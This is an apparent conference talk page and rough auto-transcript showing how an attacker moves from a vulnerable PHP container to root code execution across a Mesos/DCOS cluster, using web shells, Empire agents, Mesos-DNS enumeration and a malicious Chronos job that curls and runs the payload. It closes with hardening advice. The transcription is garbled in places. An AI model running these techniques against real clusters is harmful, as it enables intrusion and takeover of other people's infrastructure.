← All talks

One Compromise to Rule Them All

BSides Las Vegas · 201653:00309 viewsPublished 2016-08Watch on YouTube ↗
Speakers
Tags
About this talk
Bryce Kunz and Scott demonstrate how to exploit a compromised DCOS (data center operating system) and Mesos cluster. Starting from initial access to a container, the speakers show reconnaissance techniques using DNS enumeration and API calls to map cluster topology, then escalate privileges across the cluster via job scheduling frameworks like Chronos and Marathon to achieve root-level code execution on cluster agents.
Show original YouTube description
One Compromise to Rule Them All - Bryce Kunz Breaking Ground BSidesLV 2016 - Tuscany Hotel - Aug 03, 2016
Show transcript [en]

we have a price and Scott they're going to be presenting one compromise rule them all it's going to be a little bit of an addition to the previous presentation on Empire so with that I'll leave it's bryson Scott can you guys hear that okay now great Scott's going to show you today a little bit about dcos and mezzos and why you might want to check out these technologies for doing job orchestration across your data centers and then I'm going to show you today why you should take just a little bit extra time to try and secure down some of the building blocks that DCOs is built upon so I'm hand it over to Scott to do get you a little bit up speed is

anybody in the room familiar with DC OS or mezzos are they using that in their day job for fun we've got a couple of people so DCOs stands for data center operating system it was born out of a need to efficiently use resource into your data center a lot of organizations find that just running jobs on our servers they're seeing about sixty to sixty-five percent utilization of their servers like the hardware that they have in their data centers meaning they have millions tens of millions lots of dollars worth of hardware that's just sitting in in their rooms that they're paying for that's not really giving any use for them so DCOs was born to kind of

solve some of this problem the philosophy behind dcos is yew tree it you treat all the resources hardware in your data center as a single box you bubble all those resources up into one place where you can then send jobs to different places to make sure that you're running your hardware as efficiently as you can yeah so at the bottom of this cluster you need something that can run it like an operating system which is a kernel mezzos is kind of the colonel layer of this D cos there are two pieces of maize oh so there's the cluster which is set of masters that receives offers from agents or slaves the agents are slaves you install on hardware or VMs or cloud

instances that make resource offers up to mezzos so that's this bottom tier on top of mezzos you have a set of frameworks those frameworks do job definitions so if you have like a set of Apache servers do you want running if you have batch jobs if you have scheduled jobs there's different frameworks that will handle those different types of jobs on top of that is where you deploy your applications usually these are multi-tenant clusters they can be multi-tenant clusters meaning you'll have jobs different types of jobs running for different teams probably not different companies but more than likely different types of jobs running on here these are usually packaged up in containers handful of different container using technologies

but typically docker so you write your job in docker you orchestrate it using a framework and then mezzos takes those job definitions and spreads them across finds places for them to run a little bit more about the communications between these the agents are running on this Hardware at the bottom or VMS or whatever they communicate with mezzos using a configuration share called zookeeper easiest way to think about zookeeper is basically a network a network accessible JSON object so key store I store this value I retrieve this value somewhere else so the cluster the slaves will say I have hardware I'm offering it it'll put a red an entry in this key store the mezzos will pick that

up match your job with it put it back in and the slave will pick it back up and start executing that job between the kernel and the frameworks which is that kind of top purpley one those are typically done either via zookeeper again or rest api's that are built into mezzos some of the common frameworks of a marathon is probably the most common one pretty much any deployment of mezzos that you'll see we'll also have marathon living next to it marathons for long running jobs it's also used for scaling jobs so if I have one docker container i created job definition put that in Marathon and then you can say oh I want ten of these running or 50 of these

running you can drive it using the API so collect other metrics from the boxes say as performance goes hits eighty percent utilization increase more instances in this pool Chronos is basically at kron4 dcos so you can give it a job definition which can be something as simple as a like just a normal bash command give it a time frame and a frequency to execute on and it'll just whatever that time frame hits ping it so you can see a lot of the correlations between dcos and these services and frameworks as you've seen a normal operating system yeah so typical use I have my docker container I create a job in Marathon hear it mezzos finds a

host to run it on sends the command to the agent the agent pulls down the docker container runs it with whatever environment variables or arguments need to be passed into it and yeah that's that's kind of the typical use yeah I'll handle oh no no quick demo so this is what D cos looks like as a UI so it shows what your utilization is across the host obviously we're not using our stuff very efficiently right now you can see what services have been spun up in D cos Chronos and marathon are frameworks but they can also be run inside of mezzo so here there's a little bit of inception going on but Chronos and marathon services running inside of

mezzos as well as communicating with mezzos if we want wanted to set up a schedule job we would jump into Chronos come on Chronos and you could create a job here it's been a little sluggish come on Chronos if we didn't do sufficient sacrifices to our demo gods effectively here to pop up you give it a command you give it a time frame in it whenever that time frame hits that will trigger the job via marathon

order for having VPN problems now we're dead

alright yeah marathon you'd be able to see the jobs that are already to find how many instances they're running and you also be given the option to scale it up or down so it's is really well built for scaling and high availability of your application running in here obviously this is a pretty small cluster and conference Wi-Fi isn't awesome but yeah we'll move forward I don't and take it back over okay so it's good thanks God okay so how many of you seen Lord of the Rings yeah okay so I know we just went over a lot of stuff right and for the most part people haven't heard of these technologies before so these technologies are being moved towards

high utilization inside of companies that guys are probably acquainted with like for example if you go to the maze oh's website you'll see a list of over 100 companies some of those are like Airbnb and things like that that are using the cluster to automatically speed up processing and and do you kind of cpu intensive tasks at scale so so alright so now we're going to talk about initial access inside the cluster so this talk is more a post exploitation talk and we're going to show you some brand new empire modules that are going to enable you to talk to these various building blocks or services that are inside of the DCOs cluster so that's that's kind

of the crutch of what we're getting too but before we do that we got to get initial access into the cluster right so how many of you have ever hacked a website before raising hands yeah so you know there you go right so go over here on the VPN okay great anco over here so i have this at this container it's running inside of our dcos cluster this is publicly accessible in the internet so it just has a vulnerable a vulnerable PHP application so this isn't anything crazy but if you see here I just wrote really quickly this eval at PHP and if you press pass eval and it'll show you this so you just pass you all parameter

and that parameter just gets eval right so you get system on it so you know that's really trivial that's not anything you know mind-blowing because what we're trying to do is show what happens once you get remote code execution on inside a web app inside of that cluster container so coming over to here so I'm going to ask this H out to my box and pray to demo God's that this is going to work all right i'm gonna drop from VPN see if it works then ok we're on the box sweet is that text clear big enough for you guys or you want a bigger bigger all right bigger it is i give the people

what they want alright is that good ok alright sweet ok we're up on our box we're a hacker right we've used this eval shell to drop down a weave lee shell on the box a weave Lee's like a c99 a public shell that I frequently use when I'm pentesting websites how many of you raise your hands have heard of Weasley before ok quite a bit cool so it's kind of modular like metasploit you can write additional code and it will actually eval it on using a PHP email on the server side and kind of keep it more in memory so if someone does on file disk analysis they'll just find the highway randomized Weasley loader on the

remote side so if you haven't used we flee before for web shells you should definitely check it out although that's not what this talks about so so I got a bunch of screen sessions running on this so I got one set up for we've Lee we've Lee you give it the name of the Python which is the operator side of weave Lee then you give it the web address so you can see here this is our website and this is a you need a password interact with it so I'm going to tear this off the internet hopefully after the demo so you guys can't hack my box but please don't screw up my demos in the meantime

alright so when you drop into we've Lee shell you just get this prompt if you execute a regular command you can execute commands just like you were on the box if you want to execute a weave Lee specific module you can just do colon and then the module name or if you're confused call and help will list out all the modules so we're not we're just going to use this to get interactive sweet so we got kind of a web shell on the remote target inside this container inside the DCOs cluster so we what we really want to do is we want to get a full interactive remote access tool running in that room outside right so we

can you know pivot through the network redirect things like that so how many of you raise the hands you have you used Empire before any any version Empire okay a couple okay what about meterpreter you guys use meterpreter yeah a lot of you okay great so it's just a post exploitation rot allows you to interact with the system so there's two versions of empire there's the PowerShell version which is for windows and then there's the Python version which is more focused on OSX recently code changes in it have enabled you to also use that on a set of us and BSD targets back porting support for 5.25

written in Python so so we want to get Empire running on this box right so one thing one catch people they're obsessed with making their containers as small as possible right so they want the least amount of dependencies in the container because they want them to be able to easily scale and they want them not to take up as much resources so what does that mean for us as an attacker we don't have as many options for post exploitation as you might on a normal next box a normal linux box so so let's say we're all in this box we really want to get Empire up and running on it so normally if there python to be there we

just be able to execute Empire and be good but if we do which python on the box it doesn't return back anything because pythons not installed inside the container so I docker how many you guys use docker before his hands yeah some of you so doctor has a repo that's public so I pulled down the top five containers in the docker repo this is the top five containers that people have downloaded of the top five only one had Python installed on it by D so as a person who's trying to hack into dcos clusters this poses a problem for me so i built a stager a new stager for Empire and I'm going to for all the new

stuff I'm going to push it in to do a pull request tonight for it so you guys check back tonight you'll see it's there well at least in the pull request Intel well or whoever is upset so alright cool so we got oh yeah we got actually got to show you guys that the solution so the solution that I come up with is that it's not the perfect solution but it works is I built a Empire stager that will actually build an elf binary using pi installer so it's going to generate your stage or inside an empire then it's going to reach out to PI installer and compile figure out what dependencies that needs and then compile that all

back to an elf binary that you can just remote up you can remotely drop that elf binary in the target those you don't know elf binaries are like EXT s for linux systems so all right so here we go let's go over to empire interact all right have I lost anybody maybe but if you guys have questions feel free all right I get thumbs up so I'm just gonna keep going so all right so i'm going to show you guys how to use empire as part of this i'm sure well did a much better job the guys before but uh but i'll show you my way so you just dot slash empire and then then you need to establish a

listener first so there's a port that we're going to bind to on the attacker signed and this is what our Empire rat it's going to be kin back to and we're going to use to interact with the remote container so right here if you copy what I'm doing in this presentation in a real pen toast you're gonna have really bad OPSEC and probably get caught so you might want to up the game a little bit but I've just established the default which is it's going to listen on port 8080 so when we execute the Empire rat it's going to connect back to this server on a DAT and then we're going to be able to issue commands and all that

and I just name the name of the listener test because trying to get stuff done so then we do you stager and then we just do PI installer so this is a new thing right so but the other state it works exactly like the other stagers you just do you use stage you're planning cellar it shows you all the options you need to set the only one we really care about right now is we need to tell which listener to call back to we only have one listener the test one and that's bound to port 8080 TCP so set listener to 88 or to test right and then do info and then the only one other

thing you want to note here is it's going to build the elf binary and chuck it in temp and call it Empire right not not too stealthy but nonetheless it's going to work right so okay here you go so what it does it's going to reach out scan through a couple Python files figure out what dependencies you need klab those back together into this Python file right here and then reach out to PI installer and automatically use it to and stuff to create the health binary so elf binary is now made on this remote system so if we go into / temp we can see there's now a binary call elf and if we file it we can see it is in

fact an elf sixty four-bit binary if you want to do something crazy you're like I really like where you're going but I want to go put some crazy code in and then how they compile it just for convenience I left the source file here and i left the spec file which is what PI installer uses to compile and make the elf so you can do some easy customization they're kind of use this to jump start okay and then just because I'm just trying to demo things to you guys today I'm just we're just going to move these binaries into target by basically doing a PHP version of WK right so I started up just like a kind

of a hawk web server on this block and you see the ad hoc web server is running here but just in case you don't know this trick this is a really cool trick if you're on Python you need a really quick HTTP webserver just do you pike on tech em for module and then use simple HTTP server and actually establish a web server on the box and it will dish out any files that are in that direct so here we're going to dish out files that are in / 10 so it's just kind of convenient okay yeah let's push it back okay here you go so that's just a trick to because I'm do not like setting up

apache web servers just to pull it on a file right so Oh shouldn't quit that a wrong thing all right we're good all right I just said a lot of words so hopefully you guys are still tracking with me here all right I swear once we get in the network it's going to be like butter okay so it's just way for it I know it's a lot of setup for it alright we're back in weave Lee now so we got a double you get the binary we've Lee makes this super easy it actually just has a function and I'm going to find it oh let's make sure it's not there from a previous demo nope we're good now things

in / temp on the remote target now we're going to use this module we've Lee module 2 depth to basically w get the file using PHP yeah we flee makes our life easy so we just wait a second because it's downloading a file files now there we can even command up and we flee and now we can see the files on the remote target so we just need to make sure we schmatte it and then to make sure it's executable in the remote target this is a linux box that we're just going to kick it off using a using just a straight command so this is the weave lee the PHP shell is going to kick

off Empire the binary pulled down using we flee from the simple Python server okay all right here we go all right now in an ideal scenario if we come back around to empire will now see the glorious text that we've all been waiting for which his initial agent from this IP is now active right this means we got we got a new agent inside the target Network so if you tell you agents we can see all the agents there's only one here and then we just type interact and then the name of the agent and then we can one thing that is really helpful inside an empire is the rename so we just rename that to ever we want so I'm just going

to rename this to like a web app or something so we can we can remember where we are in the network's because we're going to get it we're not going to stop at one agent right we're going to go through and tear this network up so all right and I got to get back to the slides because we're missing out on some killer memes right so so is the top five that I analyzed only one head Python and that's the registry one the other four top ones did not have Python so if we use the PI installer trick we can get around that yeah pack it up boys we're going on a pony trip so so this is

pretty much us now we are that hacker dude that's Scott master hacker and then throwing lightning bolts we get our that little icon with the Python that's like the little iPod Empire logo I don't know maybe you guys got some of the stickers from before so we got that running inside a container inside the DCOs cluster so so what we first got to do when we get inside ad cos or maize those cluster is we want to orientate ourselves by doing a little bit of recon against some of those systems that hold ya information about where services are available in cluster one of the tenants of the cluster is basically a slave can die and a new slaves can come up and the

cluster will make sure like always three of this container or running or always a hundred of this container or runny and it will realize how these those dive we need to spend more up and and you also do like traffic redirection through eh eh boxing all kinds of other stuff so all right so i'm going to show you now how to extract information from nasos dns service so maze owes DNS it provides two avenues to for you for containers or services or apps to get information out of it provides a traditional dns service i'm not really going to talk about that today any of your traditional dns reconnaissance techniques will work against that what i'm going to show you

is they have a new API that they build out and that I feel like a lot of developers are going to use to try and orientate themselves inside the DCO west cluster so I'm going to show you how to extract information out of that and we need that information to exploit more stuff could i make an interjection yeah go stretch it over so the the dns both the service and the api is pretty important to the whole ecosphere of mezzos based on the concept that basically any service could end up popping up on any agent so in order to figure out what like what resources you're talking to you can't do that by AP you have to be doing it by by dns

record so this isn't really something that could easily be stripped out of all of mezzos because the frameworks themselves need it to know what end points to talk to both IP and port because either one of those could be could be random well is random in most cases ok great thanks Scott so interacting with the web app Empire agent so I wrote this module for Empire it's it's really nothing more than it it allows you to do dns lookups inside the network i just wanted to show you something about the DCOs cluster so you kind of understand the easiest way to kind of orientate yourself once you get initial access so there's a there's a

TLD called call mezzos so and most of the services will have a name under that so master mezzos once you get inside the network will resolve to the master marathon mezzos will resolve to the marathon box Kronos dummies those words onto the Kronos box and then you can also see what people things are co-hosted because they're going to give you back the same IP so if we just do we just said master may see us and then execute then it just shows us hey it's on this 10 dot address inside the internal network so it's doing a DNS woke up so so go into something a little bit more I mean that's really simple right you could do

that using ping or anything on a box I want to show you a module that I wrote that a so so the next thing you really want to do is I wrote this other module it's mais o Dinah's API and numerate so when looking through the source code and i found an api function called enumerate it is basically the equivalent of a zone transfer so it will dump all of the data about everything in the cluster that maze those dns knows so I don't think this is undocumented but it's also not in the documentation so but the developers do talk about it like in github issues so i don't think i think the documentation is just not been

updated yet so but you I mean you can you can have your own opinion on that so mais OU SDNS it listens on tcp port 8 123 and we can just determine that where that is because it's usually coasted on the master and and this will just make an a web request out to it call the HTTP API and then it will collect the JSON it returns the results in a JSON format and then Empire is just going to record those down to disk so you can see this worked it recorded it to disk right here and I'm just going to show you what it looks like because a couple modules kind of do the same thing but I just

but I just want you to kind of be able to visualize more what this looks like from an attackers perspective

okay so it just returns back this JSON blob and the first thing is going to tell us is the frameworks that are in the cluster and then it's going to say hey inside this framework there's tasks and inside here there's this proxy and this proxy is on this slave like this physical hardware box that's the IP of it in the cluster and then the most important thing that this is going to give us though is the IP and then the random high port so one of the things you're going to find with dcos and maze OSAS services are come services are coming ups going up and down and every time they do on a slave their service is

not going to bind to a normal port so even though this is probably a proxy for Apache or another web service it's going to bind to these random high ports so querying the dns service and figuring out what those are it's going to enable us to further exploit additional services and what we really want out of this is want this Chronos because Chronos is kind of like crontab for the DCOs data center so if we can interact with Chronos we can schedule malicious task and execute them and so here we see that a Chronos is on dot one sixty and then the most important thing is Chronos is random high port is 6 1 2 3 2 so you

could I guess scan the whole cluster to figure these stuff out but it's just easier to ask right all right sweet alright so we know where Chronos is in the cluster now so now we can do a little bit more pwnage

what I'm god 35 oh ok cool

so when you set up your cluster inside your data center yeah most people use that TLD 40 the question is do most people use the mezzos domain name is that it so and the answer is yes like a lot of people are hard baking that into their infrastructure I when it's used by a lot of the frameworks by default and then to you have to have some way to discover where the services are so you can interact with each other the real problem here is that there's really no uh there's no are back right so there's like why does a web app need to be able to ask where the Chronos cluster is doesn't right but it can get everything

so which I think they're working on but it's kind of like a work in progress so okay cool so we can also interact with the master via its API and then the one thing that this is going to give us is it will give us a complete list of all the slaves that are there all the IP addresses are in the cluster that could be slaves that are in the cluster that we want to get on but are just like don't have any docker containers on currently so we kind of missed those if we just went after the dns service so just going to kind of skip over that because it's the Zack same thing

research it's another module really seen and then returns back a JSON blob got recon for sure okay all right so we got our Empire agent and then we got Chronos running in a container inside the cluster we now know where that is by our reconnaissance modules so now we're going to interact with that to get additional empires inside of it all right so I got really excited because I was like great we're not going to run inside a container anymore we're going to use Chronos to pop out and run as root on these on these hosts so we should be able to natively use Empire without having to comply to the elf binary that that premise did not work out so

the core rest is kind of another strip down OS designed for loading of containers and the version of Python that's installed on it by default does not have URL led to which is a requirement right now for easy Empire natively so it's not a big deal we just use the elf by you again but I was a little bit disappointed right so all right come around to here

alright so we can do the Recon the only thing about the Recon that you really want to take know is uh against the mezzos master is it it listens on tcp for 50 50 and for the most part people aren't going to change that because all the slaves or agents are gonna have to talk back to that okay so here we go is where it starts to get a little bit funner so I wrote this module it's called Chronos API list jobs and what it's going to do is inside of Corrado's which is here we can see we can visualize the list of the jobs right so this is going to interact with the API

pull back a JSON blob that's going to have this do the thing Chronos job in there and all this job is really doing inside of our cluster right now is it saying hey execute the sleep command on the box so this is kind of just a demo thing but so what I like to do is I list all the jobs in the Chronos framework then I can add job that looks really similar to the other jobs to blend in and then execute that job and then delete that job so I'm clean because I don't want someone to come in and find my job my malicious job so so so we get a listing just by interacting with the

Chronos mezzos TLD we just execute on that and that's going to save back a list of all the jobs to this JSON blob just looks pretty identical to the last two songs that showed you so I'm not going to that up but and then and then now let's go out a job right now that we know what the jobs are let's go out a job so Chronos API add job we do info okay so the couple things we need to do here like one where's Chronos in the network we can pretty much use the TLD trick to do that then to these parameters right here we mostly just want to blend in with what we listed out like we probably

don't want to make up an owner that doesn't exist somebody might get suspicious if they have logging enabled about that and then the name of the job or the description of the job is when you click on the job and the GUI you can see the descriptions right here so you just want to blend that in and then the name right here we want to blend that into so I just call mine scheduled jobs you're 01 description scheduled job 001 and then the main thing that we want to change here is the the port right so the mezzos is going to automatically deploy the container inside the DCOs cluster so remember we have to use the DNS recall

and to figure out what port it was so if you guys were I think it was 6 2 3 2 okay great and then by default this is just executing the ID command so we want to do something a little bit more malicious than that so go over here and we're just going to execute this this one liner here which is going to set the command to curl the Empire binary that is available via our Python simple HTTP server set it as executable schmatte it and then execute it on on the witch and so we're not really specifying if you notice which slave or agent to execute this on the framework is going to figure

out what has resources and just randomly deploy it there so i'm working on a newer version of the module right now that actually is going to let you set that parameter because i found a way to do that but but that'll take a look they'll be like a week or two before i get that out so so we just set that and then you can type info and then you can see are malicious command is set up there well good and then we type execute so with Chronos it's kind of a two-step thing we're going to add it and then it's kind of like it wants like a cron schedule so we could set the cron if we

know the remote targets time or assume the remote targets time is similar to our own so that it would execute like in five minutes or something that I don't know if you guys remember like scheduling at jobs and Windows domains and classic stuff like that we could we could do that same thing here but there's actually an API call that just says xq now so so I wrote another module for that but hopefully this one comes back it worked one buddy don't do that go back let's screw something up it's got hard to tell what the resolution a I'll make it big again once I about just 32 16 32 web a command kronos try different job name oh you think the

job okay let's just go check agents oh no okay all right all right oh that's right we didn't set it to run yeah so yeah but that sleep so it should so let me jump in really quickly so in the kronos job definitions it's not a normal cron schedule it's not like star 1 star star whatever you specify a start time and a period so if you say go 2040 like a 24 hour time period but start sometime in the past it'll fire immediately and then it will fire 24 hours later so it's not a normal cron schedule it's a start time and period which is kind of it's a little bit different no

all right that's okay so yeah we it should it should show up here if it was working from a tiny be having a hard time all right okay just one minute jump back into we've Lee all right you still see it's executing interact again with this session take off another one thanks

go back around to empire okay agents in Iraq g7 I ok go here you this module is the simply too simple Python servers to ruin oh that's like well it should fashion a matter for this right but yeah we should we should check that to set this set the poor

okay and then do execute in the remote target Network okay there we go okay all right so hopefully it shows up now here I don't know why though their empire died okay there we go here's our job AAA you can see it's malicious you can also see the last time it ran was never so we haven't started it yet if we actually set the timings correct on it we could get it to like schedule out for five minutes but a it's just easier in my opinion to use this other API call and hopefully I'll be able to consolidate these all into like one module and then your future then execute okay come on buddy oh the name is wrong that's

changed it setname to AAA and then execute

okay great so you should see over here in a second it's going to refresh and then it's going to say runny so we got running now and that's great because hopefully it pulled back down our Empire and we got a new empire agent on the inside the system so so we go to agents and we can interact with the new one and uh so cool part about Empire is you can see who you're running ads over here so you can see we're running as apache on the first two ones then this new one we're running as root so and then we could just make sure we're running as root by doing a shell ID execute and you

can see comes back with ID command so so oh thanks as a long road but but so also yeah you want to schedule job and it's executed so so that's that's basically the diagram we had the agent because we popped a web server we talked to Kronos framework after doing recall and you figure out where it is and now we got Empire run yazoo inside the cluster right you could just repeat that until you get a code execution on every single slave or agent as root inside the cluster yeah or working on the new technique to get you took more targeted in the network ok cool I'm just going to check time oh we're pretty high in time

so I'm not going to do this one but figure it out this how to do the same thing but instead of interacting with pronouns we just interact directly with marathon I've never seen anyone run a maze O's cluster without marathon you could technically not have Chronos in there but uh you pretty much knew the marathon so if you can talk to marathon you can do the same thing it's the same process you need marathon right yeah yeah yeah you're pretty jacked about it alright so that was that demo I'm skipping it your data centers too pretentious and that would get us a slate running as root doctor is running Empire running another slave all right

so all right yeah so once you own the cluster like you can spin up jobs you can spin those things out you'll notice that at no point did we do any kind of container breakout to go from having access in this container to having agents running as root on the other agents so once you get there where can you go DCOs is highly automated bull and most the time when people are using it they're going to be interested in in tightening up their release pipeline so a lot of times you'll see DCOs you also people see people doing the same kind of like really high speed releases like automated everywhere from a push to get

to a new version of your application coming out and running in production what that means is you'll often see these boxes and production with access back to some point where bill artifacts live that could be back to get directly it's almost guaranteed to be back to some kind of doctor private registry so by looking at the job definitions that you'll see in marathon and Chronos you'll see the credentials and the locations that you need to go back in pull more pieces of information out it could be useful for in your pen test most of the time these applications running the docker containers are not going to be completely self-contained either like they'll need some kind of

persistent storage out to a database out to an object store somewhere that they can maintain state that means that these configure the credentials that the application will need needs to get into that container somehow that's either going to happen as part of creating the docker container Jenkins may bake those in and then ship it off to the doctor registry or it could be defined in the job definition as environment variables there's a couple things you can do there to try and make it a little bit more difficult but eventually the application is going to need those credentials to remote resources so if you have control of the cluster you have control of all the avenues of getting that those

credentials in so recommendations on how to trim some of this down some of the components in dcos do have authentication available most the time is not set up by default a lot of the frameworks all basic authentication some of the frameworks require zero authentication and you can't set up any authentication otherwise it'll break the whole framework so wherever possible on your frame works on zookeeper enable authentication enable it on the UI enable it on the API try and limit that down as much as you can one attack Avenue that we didn't really talk about was slave authentication if you had visibility to zookeeper on the mat on the mezzos master you can spin up a

malicious slave register and start receiving jobs from the master so make sure you turn on agent and framework authentication and yeah hope nothing breaks definitely test it out first next is segmentation for the demos Bryce compromised the container and then was able to immediately hit the mezzos like the control plane from there most situations there's no need for that to happen there are a handful of technologies you can use to shove the whole IP stack into the container you override the docker bridge with another way to access the network you can use a project like calico which then can put down a BGP overlay allowing the commute the communications between the containers on different hosts yeah try

to do everything you can to segment IP access from the container to only the resources it needs don't open up the management plane if you don't need to next update like this is pretty cutting-edge stuff mezzos 1 point 0 was released like five days ago and had some security features in there that we haven't really been able to do a thorough exploration of right now in versions we did an evaluation of there's no role based access control meaning if you get into D cos you're an admin and you can see your jobs you can see everybody's jobs with the new version of mezzos there's some role based access control in there that's supported at the

mezzo Slayer the frameworks still have to catch up to that in order to really make use of it yeah so a couple companies that are using mezzos this is typically used by organizations that need to run products at scale do your info SEC feud yeah okay cool infosec feud so I just wanted to see like what's the most egregious thing I could find on the internet right so there we go right so there's really no reason for any of these services to be on the internet they should at least be protected to force you to get a foothold in the network before you can pivot to them but I thought let's let's see let's go to a major cloud provider let's see

how many people have poor 8123 open and let's see what I can do like just a little bit of recon nothing too crazy right so looking at me Bezos DNS how many servers do you think we're accessible via the Internet by a quick scan of a club yeah I said yeah I was hoping for a lot more but uh I found 54 by scanning one cloud provider so that were open on the internet so so a little bit and then should we jump back one so each one of those represents an entire cluster which could be two machines it could be a thousand machines so that's not 54 boxes that's fifty four clusters yeah and then how many of them do you

guys think my zone transfer trick worked against it I thought it was going to be 100 is about fifty percent and that's because I think it's a newer feature so only about half of them are up to date so so that's why that's my theory I don't know you can go do your own research yeah yeah okay all right so um you can also interact directly with the mezzos master so I just did a quick scan of that how many do you think we're directly accessible from the internet okay I'll tell you so 41 is what I found so these are things if you just know how to talk to protocol you could tell them

to execute commands as across their entire clusters right so it's kind of kind of a big deal and then the one that I was really surprised about what zookeeper so I thought okay there's like 50 boxes for these other two services probably about the same person keeper anybody want to take a stab at how many zookeeper servers i found on the internet 3,000 and so why this is is because zookeeper predates dcos and mezzos and so a lot more services required a zookeeper but how many of these do you think enabled authentication on them under twenty percent so eighty-two percent have no authentication on them so this in my opinion is an entire like Redis like

situation where you just have rightist databases on the internet with no authentication with super sensitive data in them I think you kind of the same scenario would see Cooper going on right now on the internet so I mean technically I didn't release modules for it but you could get code execution through zookeeper depending on what its uses right so but at the bare minimum it's super easy just to pull up a zookeeper GUI and browse over and view sensitive data so that's my last meme thanks to these dudes for making Empire because that's where all the modules are written for then you guys saw him them talk right before this and that's it if you guys want to talk

as any questions just weird like I got a couple of doctors greedy boats to go away you must feel awesome question oh yeah great questions the great let's do it Joey I played for more minutes and just quick announcement 7 p.m. till we closing ceremonies the children so any one question haha i love that question that's question best question you rockin the question I don't know alright thanks guys